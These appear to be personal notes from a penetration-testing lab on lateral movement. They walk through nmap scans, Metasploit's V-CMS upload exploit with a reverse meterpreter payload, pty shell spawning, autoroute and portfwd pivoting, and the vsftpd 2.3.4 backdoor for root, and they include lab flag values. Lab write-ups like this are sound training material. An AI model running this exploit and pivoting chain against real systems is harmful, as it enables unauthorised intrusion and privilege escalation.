Lateral movements
Lateral movement is a technique that adversaries use, after compromising an endpoint, to extend access to other hosts or applications in an organization.

- Get our ip
- Get machine ip
| ping demo.ine.local
- Enumerate services in the target machine
| nmap -sV -sS -O
# open ports: 80 and 3306.
- Go further on port 80
| nmap
# In the scan you will see: V-CMS-Powered by V-CMS and PHPSESSID: httponly flag not set
- Launch metasploit and search for v-cms
| service postgresql start
msfconsole -q
- Use the exploit exploit/linux/http/vcms_upload, configure it and run it
| use exploit/linux/http/vcms_upload
show options
| set RHOST
set payload php/meterpreter/reverse_tcp
- You will get a limited meterpreter. Access to the shell and print the flag
| meterpreter> shell
> cat /root/flag.txt
# 4f96a3e848d233d5af337c440e50fe3d
- Map other possible interfaces in the machine. Since ifconfig does not work, spawn the shell and try again
| which python
# it’s located under /bin, so we can use python to spawn the shell
| python -c 'import pty; pty.spawn("/bin/bash")'
| $root@machine> ifconfig
# it tells us about another interface:
- Add tunnel from interface (which is session 1 of meterpreter) and the discovered interface, with the utility route:
| meterpreter> run autoroute -s -n
# you can also add a route out of the meterpreter. In that case you need to specify the meterpreter session: route add .0 1
- Background the meterpreter session and check if the route is added successfully to the metasploit's routing table.
| meterpreter> background
msf> route print
- Run auxiliary TCP port scanning module to discover any available hosts (From IP .3 to .10). And, if any of ports 80, 8080, 445, 21 and 22 are open on those hosts.
| msf> use auxiliary/scanner/portscan/tcp
msf auxiliary/scanner/portscan/tcp > set PORTS 80, 8080, 445, 21, 22
msf auxiliary/scanner/portscan/tcp > set RHOSTS
msf auxiliary/scanner/portscan/tcp > exploit
# Give us ports 21 and 22 open at
- In order to reach the discovered target, we need to fordward remote machine port to the local machine port. We want to target port 21 of that machine so we will forward remote port 21 to the local port 1234. This is done with the utility portfwd from meterpreter
| msf auxiliary/scanner/portscan/tcp > sessions -i 1
meterpreter> portfwd
# Tell you there is none configured
meterpreter> portfwd add -l 1234 -p 21 -r
# -l: local port
# -p 21 The port we are targeting in our attack
# -r the remote host
meterpreter> portfwd list
# It tells the active Port Forwards. Now, scan the local port using Nmap
- Run nmap on the forwarded local port to identify the service name
| meterpreter> background
msf> nmap -sS -sV -p 1234 localhost
# It tells you the ftp version: vsftpd 2.0.8 or later
- Search for vsftpd exploit module and exploit the target host using vsftpd backdoor exploit module.
| msf > search vsftpd
msf> use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit/unix/ftp/vsftpd_234_backdoor> set RHOSTS
msf exploit/unix/ftp/vsftpd_234_backdoor> exploit
# Sometimes, the exploit fails the first time. If that happens then please run the exploit again.
$> id
# you are root.
- Print the flag
| $> cat /root/flag.txt
# 58c7c29a8ab5e7c4c06256b954947f9a
Last update: 2024-11-05
Created: February 2, 2023 19:36:50